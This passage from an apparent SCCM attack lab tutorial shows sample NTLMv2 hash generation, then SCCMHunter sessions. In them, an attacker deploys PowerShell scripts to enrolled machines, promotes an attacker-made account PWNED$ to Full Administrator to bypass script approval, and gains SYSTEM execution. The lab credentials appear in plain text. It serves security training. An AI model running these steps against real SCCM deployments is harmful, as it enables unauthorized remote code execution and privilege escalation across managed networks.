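          (3, u16("win-attack.lab.local")), (7, struct.pack("<Q", datetime_to_filetime(ts))),
          (6, struct.pack("<I", FLAG_MIC_PRESENT)), (10, channel_bindings),
          (9, u16("cifs/10.10.14.207"))]
    blob = build_ntlmv2_blob(ts, bytes.fromhex("a340cc85d16b9963"), av)
    return "sccm_naa::LAB:7c9ecd471a096e11:" + "00" * 16 + ":" + blob.hex()


SAMPLE_LINE = make_sample_line()
```

Feed parse_ntlmv2_hash_line() the hash field of a real Responder line to see the same information for a live capture. The assessment only reports what the client put in the blob; whether a relay actually succeeds still depends on the target service (SMB or LDAP signing, LDAPS/HTTPS channel binding), which this code cannot see.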
2.3. Script deployment
Besides applications, SCCM can deploy and run PowerShell scripts on any enrolled computer. As SCCM administrators we can try to deploy a script to a resource.
The admin module offers many options; they are described in the wiki.
2.3.1. Getting the ResourceId
One of those options is script execution. As before, we need the target's ResourceId; get_device <device> in the admin shell returns it for the device on which we want to run commands:
python3 sccmhunter.py admin -u blwasp -p 'Password123!' -ip 172.50.0.40
SCCMHunter v1.0.5 by @garrfoster
[16:42:47] INFO [!] Enter help for extra shell commands
() (C:\) >> get_device sccm01
[17:01:38] INFO ------------------------------------------
Active: 1
Client: 1
DistinguishedName: CN=SCCM01,CN=Computers,DC=lab,DC=local
FullDomainName: LAB.LOCAL
IPAddresses: 172.50.0.21
LastLogonUserDomain: LAB
LastLogonUserName: sccm_admin
Name: SCCM01
OperatingSystemNameandVersion: Microsoft Windows NT Server 10.0
PrimaryGroupID: 515
ResourceId: 16777220
ResourceNames: SCCM01.lab.local
SID: S-1-5-21-2570265163-3918697770-3667495639-1215
SMSInstalledSites: HTB
SMSUniqueIdentifier: GUID:BB9B4076-B45A-46DA-8994-D2DAC705BB9A
------------------------------------------
2.3.2. Running the script
With the ResourceId we can push a PowerShell script file to the target: interact <resourceid>, then script /path/to/cmd.txt:
python3 sccmhunter.py admin -u rai -p 'Threathunting01' -ip 172.50.0.40
SCCMHunter v1.0.5 by @garrfoster
[19:31:54] INFO [!] Enter help for extra shell commands
() C:\ >> interact 16777221
(16777221) (C:\) >> script /home/plaintext/htb/modules/sccm/cmd.txt
[15:04:20] INFO [+] Updates script created successfully with GUID 8db90420-8acc-44b1-9d9a-6252322293dc.
[15:04:22] INFO [-] Hierarchy settings do not allow author's to approve their own scripts. All custom script execution will fail.
[15:04:22] INFO [*] Try using alternate approval credentials.
[15:04:23] INFO [+] Script with GUID 8db90420-8acc-44b1-9d9a-6252322293dc deleted.
The error is expected: by default SCCM does not let an administrator both create and run a script; a different administrator has to approve it before it will execute.
2.3.3. Bypassing the author-cannot-approve restriction
With our administrative rights we can promote a user or computer account we control to Full Administrator and use it as the approver.
To promote the previously created machine account PWNED$ we need its SID, then add_admin <account> <SID>:
(16777221) (C:\) >> get_device PWNED
[19:38:03] INFO [*] Collecting device...
[19:38:03] INFO [+] Device found.
[19:38:04] INFO ------------------------------------------
Active: 1
Client: 1
DistinguishedName: None
FullDomainName: None
IPAddresses: []
LastLogonUserDomain: None
LastLogonUserName: None
Name: PWNED
OperatingSystemNameandVersion: None
PrimaryGroupID: None
ResourceId: 16777227
ResourceNames: PWNED.None
SID: S-1-5-21-2570265163-3918697770-3667495639-1218
SMSInstalledSites: HTB
SMSUniqueIdentifier: GUID:FC0CDB69-7174-4DCA-B21F-0312BF76FA39
------------------------------------------
(16777221) (C:\) >> add_admin PWNED$ S-1-5-21-2570265163-3918697770-3667495639-1218
[19:38:28] INFO Tasked SCCM to add PWNED$ as an administrative user.
[19:38:29] INFO [+] Successfully added PWNED$ as an admin.
The new Full Administrator now serves as the approval account that automatically approves and runs our scripts: pass it with -au <account> and -ap <Password> as the alternate approval credentials:
python3 sccmhunter.py admin -u blwasp -p 'Password123!' -ip 172.50.0.40 -au 'PWNED$' -ap ComputerPass123
SCCMHunter v1.0.5 by @garrfoster
[17:11:20] INFO [!] Enter help for extra shell commands
() C:\ >> interact 16777220
(16777220) (C:\) >> script /home/plaintext/htb/modules/sccm/cmd.txt
[17:11:35] INFO [+] Updates script created successfully with GUID 913f7b53-2f86-4023-909e-1426dadcd338.
[17:11:36] INFO [+] Script with guid 913f7b53-2f86-4023-909e-1426dadcd338 approved.
[17:11:38] INFO [+] Script with guid 913f7b53-2f86-4023-909e-1426dadcd338 executed.
[17:11:55] INFO [+] Got result:
[17:11:55] INFO nt authority\\system SCCM01
[17:11:57] INFO [+] Script with GUID 913f7b53-2f86-4023-909e-1426dadcd338 deleted.